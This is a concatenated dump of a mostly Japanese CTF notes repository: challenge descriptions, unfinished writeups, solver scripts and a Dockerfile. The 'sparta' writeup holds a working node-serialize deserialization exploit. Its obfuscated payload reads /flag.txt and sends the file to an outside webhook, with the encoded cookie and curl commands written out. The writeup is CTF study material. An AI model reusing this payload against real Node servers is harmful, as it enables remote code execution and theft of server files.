"/2020/hxp_CTF_2020/nanothorpe/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Not Solved :(\n\n# Writeup\n\nリンク先のWebページにアクセスするとフォームが表示される。\n\nデフォルトで入力されている`ls`コマンドを実行してみると以下のような結果が得られる。\n\n![](img/2020-12-19-00-15-42.png)\n\nコマンドを何でも実行できるわけではなさそう。\n\n![](img/2020-12-19-00-18-33.png)\n\nリンクの`xz`ファイルを解凍する。中身はどうやらサーバー側のプログラムのようだ。\n\n```bash\ntar Jxfv nanothorpe-d2095dcfeda4b08d.tar.xz \n```\n\nWebサーバーのプログラムを見ると、エンドポイントとして`api/authorize`と`api/run`が用意されている。\n\n![](img/image1.png)\n\n`api/authorize`ではクエリパラメータに`cmd=ls`を指定すると、有効期限のタイムスタンプと`secret`を使って`signature`を計算する。\n\n`api/run`ではクエリパラメータの`cmd`に指定されている`command`を実行する。ただし、cookieの`signature`と、クエリパラメータと`secret`を使って計算した`signarute`が一致しなければならない。(緑部分)\n\n`cmd=ls`のときは緑部分が一致するので、`ls`のみは標準で実行できる。\n\n任意のコマンドを実行したいなら、`octothorpe(secret + 'query_string')`を`cookie`に設定すれば良さそう。\n\nだが、肝心の`octothorpe`の中身が解読できなかった...\n\n# Solution\n\n# Comment" }, { "alpha_fraction": 0.7450425028800964, "alphanum_fraction": 0.7677053809165955, "avg_line_length": 31.18181800842285, "blob_id": "d6dc5bef87054b6d75c74174cc5ea49e6b15c072", "content_id": "a651f27477a0495b5f9e928ffd02ac6d9c063b2a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 353, "license_type": "no_license", "max_line_length": 100, "num_lines": 11, "path": "/2021/BCACTF_2.0/Secure_Zip/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Gerald lost his homework in this zip file. He needs to extract his homework or else he fails CTF101.\n\n[chall.zip](https://objects.bcactf.com/bcactf2/secureZip/chall.zip)\n\nHint 1 of 2\n\nA quick google search of \"Free/Fast Zip password cracker\" will help find the right command\n\nHint 2 of 2\n\nGerald loves listening to the song that goes \"we will, we will\"." }, { "alpha_fraction": 0.7136929631233215, "alphanum_fraction": 0.7800830006599426, "avg_line_length": 39.16666793823242, "blob_id": "4e508596e400d561af7d5ded7cb61f3cbca4f148", "content_id": "e9a126c93b46625e45c4232f6c739031244c6005", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 241, "license_type": "no_license", "max_line_length": 110, "num_lines": 6, "path": "/2021/HeroCTF_v3/EasyAssembly/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Don't worry, this one is quite easy :) Could be a good introduction to assembly !\n\nFormat : Hero{input:modified}\nAuthor : SoEasY\n\n[EasyAssembly.asm](https://www.heroctf.fr/files/c173fdcd67e80e479f7caff7ab5bd372/EasyAssembly.asm?token=eyJ1c2VyX2lkIjoxMzgyLCJ0ZWFtX2lkIjo3NDYsImZpbGVfaWQiOjY2fQ.YIQzig.woqHSQ4FDN2Q5FhQcYbt1YgUb7Y)\n" }, { "alpha_fraction": 0.6499999761581421, "alphanum_fraction": 0.7250000238418579, "avg_line_length": 13, "blob_id": "ca423e69635fce6847b2a134a303b3ae2227b790", "content_id": "6525cbf8ae024500ecdd3a9b1ffb58e4e325c1eb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 436, "license_type": "no_license", "max_line_length": 65, "num_lines": 20, "path": "/2020/KipodAfterFreeCTF/8byte/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "\nNot Solved :()\n\n# Try\n\n拡張子が`exe`だが一応`file`コマンドで確認。\n\n```bash\n$ file binary.exe\nbinary.exe: PE32 executable (console) Intel 80386, for MS Windows\n```\n\nWindows上で実行。\n\n![](img/2020-11-07-19-41-03.png)\n\nどうやら引数にフラグを入れられれば良いらしい。\n\n`angr`みたいなことができればよいが、`exe`デバッグのノウハウがないのでスキップ。\n\n# Solution" }, { "alpha_fraction": 0.6875, "alphanum_fraction": 0.7864583134651184, "avg_line_length": 37.400001525878906, "blob_id": "a050a4964329d9c4302abd9dc3b29110ea1518b9", "content_id": "d1ef706c0359ff5b3acd30b2862a1f2e7713e92e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 192, "license_type": "no_license", "max_line_length": 101, "num_lines": 5, "path": "/2021/DawgCTF_2021/Calculator/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "I hid my flag in a calculator but I forgot what the magic number is...\n\nAuthor: Percival\n\n[calculator.exe](https://umbccd.io/files/552b1f0d1c4c6705a57d987d57aee6ea/calculator.exe?token=eyJ1c2VyX2lkIjoxMjg1LCJ0ZWFtX2lkIjo3MzgsImZpbGVfaWQiOjIxfQ.YJYgoQ.M_SxtFzs97nA2-74uWLAPJyBNpM)\n" }, { "alpha_fraction": 0.800000011920929, "alphanum_fraction": 0.800000011920929, "avg_line_length": 14.333333015441895, "blob_id": "8391e31b08e286e767c545f0503bfeedac686182", "content_id": "7a7dbf24eb36fbaa3b3026d75d876eed13ba05ec", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 45, "license_type": "no_license", "max_line_length": 29, "num_lines": 3, "path": "/2020/WaniCTF/Veni_vidi/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "SYNT{fvzcyr_pynffvpny_pvcure}\n\nWriter : Laika" }, { "alpha_fraction": 0.6342412233352661, "alphanum_fraction": 0.6666666865348816, "avg_line_length": 25.586206436157227, "blob_id": "a7af983e287e9bc06c5c05fa7c175d88f4c6f8d8", "content_id": "aeeab4c035b2ba9cbaa31bdacbc918eddd2f0a55", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 771, "license_type": "no_license", "max_line_length": 82, "num_lines": 29, "path": "/2021/dCTF_2021/Just_Take_Your_Time/solver.py", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "from pwn import *\nfrom time import time\nfrom Crypto.Cipher import DES3\n\nfrom pwnlib.util.fiddling import xor\n\nio = remote('dctf-chall-just-take-your-time.westeurope.azurecontainer.io', '9999')\n\nio.recvuntil('You have one second.\\n')\n\ncalc = None\nexec('calc = ' + io.recvline().decode('utf-8').split('=')[0])\nio.sendline(str(calc))\n\nio.recvuntil('flag shall be yours!\\n')\nencrypted = bytes.fromhex(io.recvline_regex(r'[0-9a-f]*').decode('utf-8'))\n\nnow = int(time())\nfor i in range(60):\n key = str(now-i).zfill(16).encode(\"utf-8\")\n cipher = DES3.new(key, DES3.MODE_CFB, b\"00000000\")\n decrypted = cipher.decrypt(encrypted)\n if '\\\\x' not in str(decrypted):\n io.sendline(decrypted)\n print(decrypted, -i)\n break\n\nprint(io.recvall())\nio.close()\n" }, { "alpha_fraction": 0.790243923664093, "alphanum_fraction": 0.8146341443061829, "avg_line_length": 28.428571701049805, "blob_id": "4dbf09219b38d1af9b9c72be4edb2af9bb8fec93", "content_id": "2ed091f9a7ff07641e923ec037147e669c1ae8e1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 205, "license_type": "no_license", "max_line_length": 80, "num_lines": 7, "path": "/2020/CyberSecurityRumble2020/Zeh/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "For the CSR we finally created a deutsche Programmiersprache!\n\nnc chal.cybersecurityrumble.de 65123\n\n[haupt.c](https://storage.googleapis.com/ctf.cybersecurityrumble.de/zeh/haupt.c)\n\nAuthor: rugo|RedRocket" }, { "alpha_fraction": 0.6073619723320007, "alphanum_fraction": 0.6441717743873596, "avg_line_length": 12.583333015441895, "blob_id": "bcbfd7a5ba5111e312fd58aaa450139257c454f8", "content_id": "94087f63576bee2a81dc315efd864a01f2da0897", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Dockerfile", "length_bytes": 163, "license_type": "no_license", "max_line_length": 44, "num_lines": 12, "path": "/2021/WaniCTF21-spring/Git_Master/mis-git-master/Dockerfile", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "FROM ubuntu:20.04\n\nLABEL maintainer=\"[email protected]\"\n\nRUN apt update \\\n && apt install -y nginx\n\nEXPOSE 80\n\nCOPY . /var/www\n\nCMD [\"/usr/sbin/nginx\", \"-g\", \"daemon off;\"]\n" }, { "alpha_fraction": 0.6938202381134033, "alphanum_fraction": 0.7219101190567017, "avg_line_length": 31.454545974731445, "blob_id": "f56f7eebe8d6ecee2462565eb2685b03f485563d", "content_id": "4a42160f643485ba8c3e2bfea3c34c1da0b5983d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 356, "license_type": "no_license", "max_line_length": 64, "num_lines": 11, "path": "/2020/SunshineCTF/Hotel_Door_Puzzle/solver.py", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "import angr\n\np = angr.Project('hotel_key_puzzle')\nmain_addr = p.loader.main_object.get_symbol('main').rebased_addr\nprint('main_addr = ',main_addr)\nstate = p.factory.entry_state()\nsim = p.factory.simulation_manager(state)\naddr_success = main_addr + (0x22BA-0x221B)\nsim.explore(find=addr_success)\nif len(sim.found) > 0:\n print(sim.found[0].posix.dumps(0))" }, { "alpha_fraction": 0.6969696879386902, "alphanum_fraction": 0.75, "avg_line_length": 25.600000381469727, "blob_id": "3d721e25ad1bbd8513046399f8cd86b59f61fff6", "content_id": "6a6eb6ef92a29ac69b8632fa15724f09788be613", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 132, "license_type": "no_license", "max_line_length": 83, "num_lines": 5, "path": "/2020/kksctf_open_2020/Lynx/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Hello! We're BluePeace organisation, and we introduce the new project - Lynx Forum!\n\n[Link](http://tasks.kksctf.ru:30070/)\n\n@greg0r0" }, { "alpha_fraction": 0.2791479825973511, "alphanum_fraction": 0.35538116097450256, "avg_line_length": 33.30769348144531, "blob_id": "50ed91c9c3f5da8c00e3038782d85678f9d2a0ad", "content_id": "d38ecf8acfd97caab62472164eb5951c83ad5c70", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 892, "license_type": "no_license", "max_line_length": 90, "num_lines": 26, "path": "/2021/UIUCTF_2021/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# UIUCTF 2021\n\n* https://uiuc.tf/\n\n* 2021/07/31 09:00 JST - 2021/08/02 09:00 JST\n\n## My Challenges\n\n### Solved\n\n| tag | problem | comment | score | solved |\n| --------- | -------------------------------- | ---------------------- | ----: | -----: |\n| Misc | [CEO](CEO) | WPA, dictionary attack | 50 | 203 |\n| Crypto | [back_to_basics](back_to_basics) | base N | 50 | 103 |\n| Crypto | [dhke_intro](dhke_intro) | AES, CFB | 50 | 166 |\n| Reversing | [hvhpgs{synt}](hvhpgs{synt}) | ROT | 50 | 208 |\n| Web | [phpfuck](phpfuck) | | 50 | 251 |\n| Web | [wasmbaby](wasmbaby) | wasm | 50 | 372 |\n\n---\n\n## Result\n\n* 602 points\n\n* 159 / 658 (> 1 pt)\n" }, { "alpha_fraction": 0.8162983655929565, "alphanum_fraction": 0.8314917087554932, "avg_line_length": 25.851852416992188, "blob_id": "5b7d83955f4d4a26aad0ff07b3411625838d1115", "content_id": "16152e12bf843c24c423cff075f4efad98a3cc1b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1224, "license_type": "no_license", "max_line_length": 101, "num_lines": 27, "path": "/2020/WaniCTF/SQL_Challenge_1/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "問題ページ: https://sql1.wanictf.org/index.php?year=2011\n\n今まで見たアニメのリストをデータベースに登録したよ。間違えて秘密の情報(FLAG)もデータベースに登録しちゃったけど、たぶん誰にも見られないし大丈夫だよね。\n\n(Hint)\n\nSQL injectionの問題です。\n\nURLの「year=」の後に続く数字(年号)をSQL injectionを起こすような文字列に変更するとFLAGが表示されます。\n\n一部使えない文字もあるのでソースコード(index.php)を参考に考えてみてください。\n\n必要に応じてデータベースのスキーマ(1_schema.sql)も参考にしてください。\n\n(注意)\n\nsql-chall-1.zipは問題を解くために必須の情報ではなく、docker-composeを利用してローカルで問題環境を再現するためのものです。\n\n興味のある方は利用してみてください。\n\n[index.php](https://score.wanictf.org/storage/oshaubxunljhmdwulgubalcphkfghsmz/index.php)\n\n[1_schema.sql](https://score.wanictf.org/storage/fdmeaslfyzjpmjhitqkypmvgirsktnqa/1_schema.sql)\n\n[sql-chall-1.zip](https://score.wanictf.org/storage/xpvdcxybtelbaodfpisxojiczcakdwxa/sql-chall-1.zip)\n\nWriter : nkt" }, { "alpha_fraction": 0.4732455313205719, "alphanum_fraction": 0.6977829933166504, "avg_line_length": 33.085227966308594, "blob_id": "72be0b11181adead7ef6084e7a5b457d615dda65", "content_id": "7f1527248b6294eedfed2912a775f9e949ca9bec", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 6703, "license_type": "no_license", "max_line_length": 1439, "num_lines": 176, "path": "/2021/Zh3r0_CTF_V2/sparta/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\n* http://web.zh3r0.cf:6666\n\nにアクセスする。ポート6666は`ERR_UNSAFE_PORT`なので、\n\n```\nchrome.exe --explicitly-allowed-ports=6666\n```\n\nでChromeを起動する。ページ上では特に情報を得られなかったので、ソースコードを読む。\n\n```js\napp.post('/guest', function(req, res) {\n if (req.cookies.guest) {\n \tvar str = new Buffer(req.cookies.guest, 'base64').toString();\n \tvar obj = serialize.unserialize(str);\n \tif (obj.username) {\n \tres.send(\"Hello \" + escape(obj.username) + \". This page is currently under maintenance for Guest users. Please go back to the login page\");\n }\n } else {\n\t var username = req.body.username \n\t var country = req.body.country \n\t var city = req.body.city\n\t var serialized_info = `{\"username\":\"${username}\",\"country\":\"${country}\",\"city\":\"${city}\"}`\n var encoded_data = new Buffer(serialized_info).toString('base64');\n\t res.cookie('guest', encoded_data, {\n maxAge: 900000,\n httpOnly: true\n });\n }\n ```\n\n* http://web.zh3r0.cf:6666/guest\n\nにPOSTリクエストするとCookieがセットされる。\n\nパラメータなしでPOSTすると、以下のようになる。\n\n```bash\n$ curl -X POST http://web.zh3r0.cf:6666/guest --verbose\n* Trying 35.200.166.215:6666...\n* TCP_NODELAY set\n* Connected to web.zh3r0.cf (35.200.166.215) port 6666 (#0)\n> POST /guest HTTP/1.1\n> Host: web.zh3r0.cf:6666\n> User-Agent: curl/7.68.0\n> Accept: */*\n>\n* Mark bundle as not supporting multiuse\n< HTTP/1.1 200 OK\n< X-Powered-By: Express\n< Set-Cookie: guest=eyJ1c2VybmFtZSI6InVuZGVmaW5lZCIsImNvdW50cnkiOiJ1bmRlZmluZWQiLCJjaXR5IjoidW5kZWZpbmVkIn0%3D; Max-Age=900; Path=/; Expires=Fri, 04 Jun 2021 14:25:42 GMT; HttpOnly\n< Content-Type: text/html; charset=utf-8\n< Content-Length: 6\n< ETag: W/\"6-aTQsXDnlrl8Ad67MMsD4GBH7gZM\"\n< Date: Fri, 04 Jun 2021 14:10:42 GMT\n< Connection: keep-alive\n< Keep-Alive: timeout=5\n<\n* Connection #0 to host web.zh3r0.cf left intact\nHello!%\n```\n\nCookieの値は`eyJ1c2VybmFtZSI6InVuZGVmaW5lZCIsImNvdW50cnkiOiJ1bmRlZmluZWQiLCJjaXR5IjoidW5kZWZpbmVkIn0`であり、Base64デコードすると、`{\"username\":\"undefined\",\"country\":\"undefined\",\"city\":\"undefined\"}`となっている。\n\nまた、Cookieを入れた状態でPOSTすると以下のようになる。\n\n```bash\n$ curl -X POST http://web.zh3r0.cf:6666/guest -H 'Cookie: guest=eyJ1c2VybmFtZSI6InVuZGVmaW5lZCIsImNvdW50cnkiOiJ1bmRlZmlu\nZWQiLCJjaXR5IjoidW5kZWZpbmVkIn0%3D;' --verbose\n* Trying 35.200.166.215:6666...\n* TCP_NODELAY set\n* Connected to web.zh3r0.cf (35.200.166.215) port 6666 (#0)\n> POST /guest HTTP/1.1\n> Host: web.zh3r0.cf:6666\n> User-Agent: curl/7.68.0\n> Accept: */*\n> Cookie: guest=eyJ1c2VybmFtZSI6InVuZGVmaW5lZCIsImNvdW50cnkiOiJ1bmRlZmluZWQiLCJjaXR5IjoidW5kZWZpbmVkIn0%3D;\n>\n* Mark bundle as not supporting multiuse\n< HTTP/1.1 200 OK\n< X-Powered-By: Express\n< Content-Type: text/html; charset=utf-8\n< Content-Length: 107\n< ETag: W/\"6b-mcPBCXUs6bskleLZQZg4Tt74gBA\"\n< Date: Fri, 04 Jun 2021 14:19:54 GMT\n< Connection: keep-alive\n< Keep-Alive: timeout=5\n<\n* Connection #0 to host web.zh3r0.cf left intact\nHello undefined. This page is currently under maintenance for Guest users. Please go back to the login page%\n```\n\nJSON形式の`username`が表示されていることが確認できる。\n\n`username`の値を使ってXSSしてみる。\n\nDockerfileから、flagの内容が`/flag.txt`にあることが分かっているので、\n\n```\n{\"username\":\"<script>document.write('/flag.txt');</script>\"}\n```\n\nを送りたい。しかし`<`や`'`などはHTMLエスケープで`&lt;`や`&#39`となってしまう・・・。\n\n何か別の方法を探したところ、**`CVE-2017-5941`** を発見。コードを見た感じ、ほぼそのままなので使えそう。\n\n以下のようなJSONを`unserialize()`させると、Javascriptが即実行されるらしい。(jsonのkeyは何でもよい)\n\n```json\n{\"rce\":\"_$$ND_FUNC$$_function(){ eval(String.fromCharCode( #javascript ))}()\"}\n```\n\nExploit用のスクリプトを作る。`console.log`してもこちら側には表示されないので、hookする。\n\n```js\nconst https = require('https');\nconst fs = require('fs');\n\nvar uri = 'https://webhook.site/d709442c-232a-41d2-929d-2371e1f4d0cf/?q=';\n\nvar data = fs.readFileSync('/flag.txt');\nuri += data.toString();\n\nconst req = https.request(uri, (res) => {\n res.on('data', (chunk) => {\n console.log(`${chunk}`);\n });\n})\n\nreq.on('error', (e) => {\n console.error(`${e.message}`);\n});\n\nreq.end();\n```\n\nExploit用のJSONに変換する。\n\n```json\n{\"rce\":\"_$$ND_FUNC$$_function(){ eval(String.fromCharCode(10,99,111,110,115,116,32,104,116,116,112,115,32,61,32,114,101,113,117,105,114,101,40,39,104,116,116,112,115,39,41,59,10,99,111,110,115,116,32,102,115,32,61,32,114,101,113,117,105,114,101,40,39,102,115,39,41,59,10,10,118,97,114,32,117,114,105,32,61,32,39,104,116,116,112,115,58,47,47,119,101,98,104,111,111,107,46,115,105,116,101,47,100,55,48,57,52,52,50,99,45,50,51,50,97,45,52,49,100,50,45,57,50,57,100,45,50,51,55,49,101,49,102,52,100,48,99,102,47,63,113,61,39,59,10,10,118,97,114,32,100,97,116,97,32,61,32,102,115,46,114,101,97,100,70,105,108,101,83,121,110,99,40,39,47,102,108,97,103,46,116,120,116,39,41,59,10,117,114,105,32,43,61,32,100,97,116,97,46,116,111,83,116,114,105,110,103,40,41,59,10,10,99,111,110,115,116,32,114,101,113,32,61,32,104,116,116,112,115,46,114,101,113,117,101,115,116,40,117,114,105,44,32,40,114,101,115,41,32,61,62,32,123,10,32,32,32,32,114,101,115,46,111,110,40,39,100,97,116,97,39,44,32,40,99,104,117,110,107,41,32,61,62,32,123,10,32,32,32,32,32,32,32,32,99,111,110,115,111,108,101,46,108,111,103,40,96,36,123,99,104,117,110,107,125,96,41,59,10,32,32,32,32,125,41,59,10,125,41,10,10,114,101,113,46,111,110,40,39,101,114,114,111,114,39,44,32,40,101,41,32,61,62,32,123,10,32,32,99,111,110,115,111,108,101,46,101,114,114,111,114,40,96,36,123,101,46,109,101,115,115,97,103,101,125,96,41,59,10,125,41,59,10,10,114,101,113,46,101,110,100,40,41,59,10))}()\"}\n```\n\nBase64変換してPOSTする。\n\n```bash\n$ curl -X POST http://web.zh3r0.cf:6666/guest -H 'Cookie: guest=eyJyY2UiOiJfJCRORF9GVU5DJCRfZnVuY3Rpb24oKXsgZXZhbChTdHJpbmcuZnJvbUNoYXJDb2RlKDEwLDk5LDExMSwxMTAsMTE1LDExNiwzMiwxMDQsMTE2LDExNiwxMTIsMTE1LDMyLDYxLDMyLDExNCwxMDEsMTEzLDExNywxMDUsMTE0LDEwMSw0MCwzOSwxMDQsMTE2LDExNiwxMTIsMTE1LDM5LDQxLDU5LDEwLDk5LDExMSwxMTAsMTE1LDExNiwzMiwxMDIsMTE1LDMyLDYxLDMyLDExNCwxMDEsMTEzLDExNywxMDUsMTE0LDEwMSw0MCwzOSwxMDIsMTE1LDM5LDQxLDU5LDEwLDEwLDExOCw5NywxMTQsMzIsMTE3LDExNCwxMDUsMzIsNjEsMzIsMzksMTA0LDExNiwxMTYsMTEyLDExNSw1OCw0Nyw0NywxMTksMTAxLDk4LDEwNCwxMTEsMTExLDEwNyw0NiwxMTUsMTA1LDExNiwxMDEsNDcsMTAwLDU1LDQ4LDU3LDUyLDUyLDUwLDk5LDQ1LDUwLDUxLDUwLDk3LDQ1LDUyLDQ5LDEwMCw1MCw0NSw1Nyw1MCw1NywxMDAsNDUsNTAsNTEsNTUsNDksMTAxLDQ5LDEwMiw1MiwxMDAsNDgsOTksMTAyLDQ3LDYzLDExMyw2MSwzOSw1OSwxMCwxMCwxMTgsOTcsMTE0LDMyLDEwMCw5NywxMTYsOTcsMzIsNjEsMzIsMTAyLDExNSw0NiwxMTQsMTAxLDk3LDEwMCw3MCwxMDUsMTA4LDEwMSw4MywxMjEsMTEwLDk5LDQwLDM5LDQ3LDEwMiwxMDgsOTcsMTAzLDQ2LDExNiwxMjAsMTE2LDM5LDQxLDU5LDEwLDExNywxMTQsMTA1LDMyLDQzLDYxLDMyLDEwMCw5NywxMTYsOTcsNDYsMTE2LDExMSw4MywxMTYsMTE0LDEwNSwxMTAsMTAzLDQwLDQxLDU5LDEwLDEwLDk5LDExMSwxMTAsMTE1LDExNiwzMiwxMTQsMTAxLDExMywzMiw2MSwzMiwxMDQsMTE2LDExNiwxMTIsMTE1LDQ2LDExNCwxMDEsMTEzLDExNywxMDEsMTE1LDExNiw0MCwxMTcsMTE0LDEwNSw0NCwzMiw0MCwxMTQsMTAxLDExNSw0MSwzMiw2MSw2MiwzMiwxMjMsMTAsMzIsMzIsMzIsMzIsMTE0LDEwMSwxMTUsNDYsMTExLDExMCw0MCwzOSwxMDAsOTcsMTE2LDk3LDM5LDQ0LDMyLDQwLDk5LDEwNCwxMTcsMTEwLDEwNyw0MSwzMiw2MSw2MiwzMiwxMjMsMTAsMzIsMzIsMzIsMzIsMzIsMzIsMzIsMzIsOTksMTExLDExMCwxMTUsMTExLDEwOCwxMDEsNDYsMTA4LDExMSwxMDMsNDAsOTYsMzYsMTIzLDk5LDEwNCwxMTcsMTEwLDEwNywxMjUsOTYsNDEsNTksMTAsMzIsMzIsMzIsMzIsMTI1LDQxLDU5LDEwLDEyNSw0MSwxMCwxMCwxMTQsMTAxLDExMyw0NiwxMTEsMTEwLDQwLDM5LDEwMSwxMTQsMTE0LDExMSwxMTQsMzksNDQsMzIsNDAsMTAxLDQxLDMyLDYxLDYyLDMyLDEyMywxMCwzMiwzMiw5OSwxMTEsMTEwLDExNSwxMTEsMTA4LDEwMSw0NiwxMDEsMTE0LDExNCwxMTEsMTE0LDQwLDk2LDM2LDEyMywxMDEsNDYsMTA5LDEwMSwxMTUsMTE1LDk3LDEwMywxMDEsMTI1LDk2LDQxLDU5LDEwLDEyNSw0MSw1OSwxMCwxMCwxMTQsMTAxLDExMyw0NiwxMDEsMTEwLDEwMCw0MCw0MSw1OSwxMCkpfSgpIn0=;' --verbose\n* Trying 35.200.166.215:6666...\n* TCP_NODELAY set\n* Connected to web.zh3r0.cf (35.200.166.215) port 6666 (#0)\n> POST /guest HTTP/1.1\n> Host: web.zh3r0.cf:6666\n> User-Agent: curl/7.68.0\n> Accept: */*\n> Cookie: guest=eyJyY2UiOiJfJCRORF9GVU5DJCRfZnVuY3Rpb24oKXsgZXZhbChTdHJpbmcuZnJvbUNoYXJDb2RlKDEwLDk5LDExMSwxMTAsMTE1LDExNiwzMiwxMDQsMTE2LDExNiwxMTIsMTE1LDMyLDYxLDMyLDExNCwxMDEsMTEzLDExNywxMDUsMTE0LDEwMSw0MCwzOSwxMDQsMTE2LDExNiwxMTIsMTE1LDM5LDQxLDU5LDEwLDk5LDExMSwxMTAsMTE1LDExNiwzMiwxMDIsMTE1LDMyLDYxLDMyLDExNCwxMDEsMTEzLDExNywxMDUsMTE0LDEwMSw0MCwzOSwxMDIsMTE1LDM5LDQxLDU5LDEwLDEwLDExOCw5NywxMTQsMzIsMTE3LDExNCwxMDUsMzIsNjEsMzIsMzksMTA0LDExNiwxMTYsMTEyLDExNSw1OCw0Nyw0NywxMTksMTAxLDk4LDEwNCwxMTEsMTExLDEwNyw0NiwxMTUsMTA1LDExNiwxMDEsNDcsMTAwLDU1LDQ4LDU3LDUyLDUyLDUwLDk5LDQ1LDUwLDUxLDUwLDk3LDQ1LDUyLDQ5LDEwMCw1MCw0NSw1Nyw1MCw1NywxMDAsNDUsNTAsNTEsNTUsNDksMTAxLDQ5LDEwMiw1MiwxMDAsNDgsOTksMTAyLDQ3LDYzLDExMyw2MSwzOSw1OSwxMCwxMCwxMTgsOTcsMTE0LDMyLDEwMCw5NywxMTYsOTcsMzIsNjEsMzIsMTAyLDExNSw0NiwxMTQsMTAxLDk3LDEwMCw3MCwxMDUsMTA4LDEwMSw4MywxMjEsMTEwLDk5LDQwLDM5LDQ3LDEwMiwxMDgsOTcsMTAzLDQ2LDExNiwxMjAsMTE2LDM5LDQxLDU5LDEwLDExNywxMTQsMTA1LDMyLDQzLDYxLDMyLDEwMCw5NywxMTYsOTcsNDYsMTE2LDExMSw4MywxMTYsMTE0LDEwNSwxMTAsMTAzLDQwLDQxLDU5LDEwLDEwLDk5LDExMSwxMTAsMTE1LDExNiwzMiwxMTQsMTAxLDExMywzMiw2MSwzMiwxMDQsMTE2LDExNiwxMTIsMTE1LDQ2LDExNCwxMDEsMTEzLDExNywxMDEsMTE1LDExNiw0MCwxMTcsMTE0LDEwNSw0NCwzMiw0MCwxMTQsMTAxLDExNSw0MSwzMiw2MSw2MiwzMiwxMjMsMTAsMzIsMzIsMzIsMzIsMTE0LDEwMSwxMTUsNDYsMTExLDExMCw0MCwzOSwxMDAsOTcsMTE2LDk3LDM5LDQ0LDMyLDQwLDk5LDEwNCwxMTcsMTEwLDEwNyw0MSwzMiw2MSw2MiwzMiwxMjMsMTAsMzIsMzIsMzIsMzIsMzIsMzIsMzIsMzIsOTksMTExLDExMCwxMTUsMTExLDEwOCwxMDEsNDYsMTA4LDExMSwxMDMsNDAsOTYsMzYsMTIzLDk5LDEwNCwxMTcsMTEwLDEwNywxMjUsOTYsNDEsNTksMTAsMzIsMzIsMzIsMzIsMTI1LDQxLDU5LDEwLDEyNSw0MSwxMCwxMCwxMTQsMTAxLDExMyw0NiwxMTEsMTEwLDQwLDM5LDEwMSwxMTQsMTE0LDExMSwxMTQsMzksNDQsMzIsNDAsMTAxLDQxLDMyLDYxLDYyLDMyLDEyMywxMCwzMiwzMiw5OSwxMTEsMTEwLDExNSwxMTEsMTA4LDEwMSw0NiwxMDEsMTE0LDExNCwxMTEsMTE0LDQwLDk2LDM2LDEyMywxMDEsNDYsMTA5LDEwMSwxMTUsMTE1LDk3LDEwMywxMDEsMTI1LDk2LDQxLDU5LDEwLDEyNSw0MSw1OSwxMCwxMCwxMTQsMTAxLDExMyw0NiwxMDEsMTEwLDEwMCw0MCw0MSw1OSwxMCkpfSgpIn0=;\n>\n* Mark bundle as not supporting multiuse\n< HTTP/1.1 200 OK\n< X-Powered-By: Express\n< Content-Type: text/html; charset=utf-8\n< Content-Length: 6\n< ETag: W/\"6-aTQsXDnlrl8Ad67MMsD4GBH7gZM\"\n< Date: Sat, 05 Jun 2021 04:05:09 GMT\n< Connection: keep-alive\n< Keep-Alive: timeout=5\n<\n* Connection #0 to host web.zh3r0.cf left intact\nHello!%\n```\n\nflagの中身を取ることができた。\n\n![](img/2021-06-05-13-06-22.png)\n\n<!-- zh3r0{4ll_y0u_h4d_t0_d0_w4s_m0v3_th3_0bjc3ts_3mper0r} -->\n" }, { "alpha_fraction": 0.6666666865348816, "alphanum_fraction": 0.8245614171028137, "avg_line_length": 57, "blob_id": "ca80373826412c9332f7a913b4eacca4639646cc", "content_id": "818e84c9782dc5452456ac4f1d2a51d73eb2d2d9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 57, "license_type": "no_license", "max_line_length": 57, "num_lines": 1, "path": "/2020/SunshineCTF/speedrun-00/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "`nc chal.2020.sunshinectf.org 30000` Author: guyinatuxedo" }, { "alpha_fraction": 0.7275747656822205, "alphanum_fraction": 0.7607973217964172, "avg_line_length": 42.14285659790039, "blob_id": "5ec1fc8e311437120f88a0c7fc374ee97da49d51", "content_id": "60b2068e5742c985d82fecf2b36fc8fe6c49b265", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 301, "license_type": "no_license", "max_line_length": 194, "num_lines": 7, "path": "/2021/BCACTF_2.0/Agent_Gerald/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Agent Gerald is a spy in SI-6 (Stegosaurus Intelligence-6). We need you to infiltrate this top-secret SI-6 webpage, but it looks like it can only be accessed by Agent Gerald's special browser...\n\nhttp://web.bcactf.com:49156/\n\nHint 1 of 1\n\nWhat is a way webpages know what kind of browser you're using?" }, { 